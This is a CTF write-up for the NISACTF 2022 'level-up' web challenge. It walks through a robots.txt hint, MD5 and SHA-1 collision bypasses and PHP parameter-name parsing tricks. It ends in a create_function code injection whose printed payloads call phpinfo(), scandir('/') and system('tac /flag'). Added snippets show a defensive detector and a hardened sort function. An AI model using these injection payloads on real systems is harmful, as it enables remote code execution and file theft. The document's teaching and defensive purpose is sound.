NSS [NISACTF 2022]level-up


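The landing page shows nothing; the hint is in a comment in the page source.

Seeing "disallow" immediately suggests robots.txt.

Level 2: MD5 strong collision; the colliding array1 and array2 values are sent URL-encoded with Burp.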


Level 3: SHA-1 strong collision, with the colliding pair passed in array1 and array2.


Level 4: PHP variable parsing bypass.

?NI+SA[=txw4ever   // PHP variable-name parsing bypass; ?NI+SA+ works, ?NI[SA[ does not, I don't know why
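The name rewriting behind this level, as an added example that is not part of the original post: PHP replaces spaces and dots in parameter names with _, and on PHP 7 an unmatched [ also becomes _, after which the rest of the name is left as it is. rewritten_params and WELL_FORMED are hypothetical names; the helper reports every parameter whose registered name differs from the name on the wire, which is the name a filter or log rule should be checking.

```php
<?php
// Names PHP registers unchanged: no space or dot in the base, brackets well formed.
const WELL_FORMED = '/^[^ .\[\]]+(\[[^\[\]]*\])*$/';

// Returns raw name => registered name for each parameter whose name PHP rewrites.
function rewritten_params(string $query): array
{
    $changed = [];
    foreach (explode('&', $query) as $pair) {
        if ($pair === '') {
            continue;
        }
        // Name exactly as a raw query-string filter would see it after URL decoding.
        $raw = urldecode(explode('=', $pair, 2)[0]);
        if (preg_match(WELL_FORMED, $raw)) {
            continue;
        }
        $parsed = [];
        parse_str($pair, $parsed);          // same name handling as $_GET
        $changed[$raw] = (string) key($parsed);
    }
    return $changed;
}

// The three names from the page, as constructed query strings.
foreach (['NI+SA[=txw4ever', 'NI+SA+=txw4ever', 'NI[SA[=txw4ever'] as $query) {
    var_dump(rewritten_params($query));
}
```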

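Level 5:

The regular expression requires that the first character not be a letter, digit or underscore.

Of the trailing flags, /i makes the match case-insensitive, /s matches any non-visible characters, and /D means that when $ anchors the end, a trailing newline is not allowed.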


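PHP create_function availability: PHP 4 >= 4.0.1, PHP 5, PHP 7


Reference: [PHP code audit] The create_function() function, o3Ev's blog (CSDN)

create_function(string $args, string $code)
// string $args  the parameter list of the function being declared
// string $code  the code of the function body

create_function() creates an anonymous (lambda-style) function and runs eval() internally. Here that means the trailing return statement gets executed, and that statement sits exactly in the (string $code) argument.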

<?php
$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');
echo "New anonymous function: $newfunc\n";
echo $newfunc(2, M_E) . "\n";
// outputs
// New anonymous function: lambda_1
// ln(2) + ln(2.718281828459) = 1.6931471805599
?> 

An example:

<?php
error_reporting(0);
$sort_by = $_GET['sort_by'];
$sorter = 'strnatcasecmp';
$databases=array('1234','4321');
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';
usort($databases, create_function('$a, $b', $sort_function));
?>


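Passing ?sort_by='"]);}phpinfo();/* in the URL turns the generated function body into:
 return 1 * strnatcasecmp($a["'"]);}phpinfo();/*"], $b["'"]);}phpinfo();/*"]);
The } closes the function that create_function() wraps around the body, phpinfo() runs as a separate statement, and /* comments out everything after it.

It feels a little like SQL injection.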
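The string assembly described above next to a hardened comparator, as an added example that is not code from the original post or the referenced blog. lambda_source, build_sort_body and safe_sort are hypothetical names, the sample rows are constructed, and lambda_source only models the wrapper text create_function() evaluates internally; nothing in the block is passed to eval().

```php
<?php
// Model of the source text create_function($args, $code) passes to eval().
// It only builds the string; nothing here is evaluated.
function lambda_source(string $args, string $code): string
{
    return 'function __lambda_func(' . $args . '){' . $code . '}';
}

// Same concatenation as the page's $sort_function.
function build_sort_body(string $sort_by): string
{
    return ' return 1 * strnatcasecmp($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';
}

// Hardened form: the key stays data, is checked against an allow-list,
// and the comparator is a real closure, so no code is built from input.
function safe_sort(array $rows, string $sort_by, array $allowed): array
{
    if (!in_array($sort_by, $allowed, true)) {
        throw new InvalidArgumentException('unsupported sort key');
    }
    usort($rows, function (array $a, array $b) use ($sort_by): int {
        return strnatcasecmp((string) $a[$sort_by], (string) $b[$sort_by]);
    });
    return $rows;
}

$benign   = 'name';
$injected = '\'"]);}phpinfo();/*';   // sort_by value quoted on the page

// Benign input stays inside the array index; the injected one closes the body with }.
echo lambda_source('$a, $b', build_sort_body($benign)), "\n";
echo lambda_source('$a, $b', build_sort_body($injected)), "\n";

$rows = [['name' => 'img12'], ['name' => 'IMG2']];   // constructed sample rows
print_r(safe_sort($rows, 'name', ['name']));
try {
    safe_sort($rows, $injected, ['name']);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The closure form also runs on PHP 8, where create_function() no longer exists.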

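payload:

a=\create_function&b=return 'mmkjhhsd';}var_dump(scandir('/'));/*
This shows a flag file in the root directory.
Then:
?a=\create_function&b=}system('tac /flag');//

// \create: the leading \ gets past the regex, and } closes the create_function body, so code of your own can follow for command execution, e.g. system(...)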

